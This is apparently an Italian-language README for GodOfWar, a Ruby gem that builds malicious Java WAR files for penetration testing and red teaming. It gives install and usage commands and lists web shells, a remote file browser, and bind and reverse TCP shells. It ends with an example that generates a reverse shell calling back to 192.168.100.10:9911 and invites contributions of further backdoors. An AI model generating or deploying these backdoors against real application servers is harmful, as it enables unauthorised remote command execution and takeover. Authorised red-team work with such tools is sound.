
GodOfWar - Costruttore Java WAR malevolo con payload integrati
Uno strumento da riga di comando per generare payload war per scopi di penetration testing / red teaming, scritto in ruby.
.
hhh
hhhhhhh
hhhhhhhh
hhhhhhhh+
hhhhhhhh'
hhhhhhhh.
hhhhhhhhh
..-- hhhhhhhhh
-sh/.. +. hhhhhhhhh:
/+/:-/+ss-` hhhhhhhhhh:
/MMM`ss:``.` hhhhhhhhhh:
.MMMMM: hhhhhhhhhhhhhhhhh:
MMMMMMM: hhhhhhhhhhhhhhhh:
MMMMMMMMMMMMM: hhhhhhhhhhhhhhhh`
:NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`
./:`smdo+oos++- `++sNMMMMMNmh+
.-y-` ` :. / -dmddhhhhh-
o/- `//o/ /M/ `+hhhhhhhh`
/o :yosmy +y .`.hhhhhhhho
+` /../.: `.y::hhhhhs:`
` `+yys` .sy` /oohhy:
`/:s/-`` `.hh`
..` ` y+
.hNNmmNdymmmmds` :-
hs. ``.. :y- `
-hhmNmddm+ .
`NMMMMMMm
` `oMMy
`. /Md- :o
MMMMMMMMMMMMMMMMMMM:
MMMMMMMMMMMMMMMMMM:
MMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMM.
`MMMMMMMMMMMMM.
:sNMMMNMdo:
``+m:/-
`
GodOfWar - Costruttore WAR Java malevolo.
-l/--list)
--host/--port)$ gem install godofwar
$ godofwar -h
Menù di aiuto:
-p, --payload PAYLOAD Genera un war da uno dei payload disponibili.
(controlla -l/--list)
-H, --host IP_ADDR Indirizzo IP locale o remoto per il payload scelto
(usato con -p/--payload)
-P, --port PORT Porta locale o remota per il payload scelto
(usato con -p/--payload)
-o, --output [FILE] File di output e nome del deploy.
(default è il nome originale del payload. controlla '-l/--list')
-l, --list elenca tutti i payload disponibili.
-h, --help Mostra questo messaggio di aiuto.
Elenca tutti i payload
$ godofwar -l
├── cmd_get
│ └── Informazioni:
│ ├── Descrizione: Esecuzione comandi tramite interfaccia web
│ ├── OS: qualsiasi
│ ├── Impostazioni: {"false"=>"Nessuna impostazione richiesta!"}
│ ├── Utilizzo: http://host/cmd.jsp?cmd=whoami
│ ├── Riferimenti: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│ └── Percorso locale: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│ └── Informazioni:
│ ├── Descrizione: Browser di file remoto, carica, scarica, decomprime file ed esecuzione nativa di comandi
│ ├── OS: qualsiasi
│ ├── Impostazioni: {"false"=>"Nessuna impostazione richiesta!"}
│ ├── Utilizzo: http://host/filebrowser.jsp
│ ├── Riferimenti: ["http://www.vonloesch.de/filebrowser.html"]
│ └── Percorso locale: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│ └── Informazioni:
│ ├── Descrizione: Shell TCP bind
│ ├── OS: qualsiasi
│ ├── Impostazioni: {"port"=>4444, "false"=>"Nessuna impostazione richiesta!"}
│ ├── Utilizzo: http://host/reverse-shell.jsp
│ ├── Riferimenti: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│ └── Percorso locale: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│ └── Informazioni:
│ ├── Descrizione: Shell TCP reverse con un form HTML per impostare LHOST e LPORT dal browser.
│ ├── OS: qualsiasi
│ ├── Impostazioni: {"host"=>"attacker", "port"=>4444, "false"=>"Nessuna impostazione richiesta!"}
│ ├── Utilizzo: http://host/reverse_shell_ui.jsp
│ ├── Riferimenti: []
│ └── Percorso locale: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│ └── Informazioni:
│ ├── Descrizione: Shell TCP reverse. LHOST e LPORT sono hardcoded
│ ├── OS: qualsiasi
│ ├── Impostazioni: {"host"=>"attacker", "port"=>4444, "false"=>"Nessuna impostazione richiesta!"}
│ ├── Utilizzo: http://host/reverse_shell.jsp
│ ├── Riferimenti: []
│ └── Percorso locale: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
Genera payload con LHOST e LPORT
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
Dopo il deploy, puoi visitare la tua shell su (http://host:8080/puppy/puppy.jsp)
Per contribuire aggiungendo altre backdoor:
payloads.jsp nella directory appena creata (usa lo stesso nome della directory).payloads_info.json con
La gemma è disponibile come open source secondo i termini della Licenza MIT.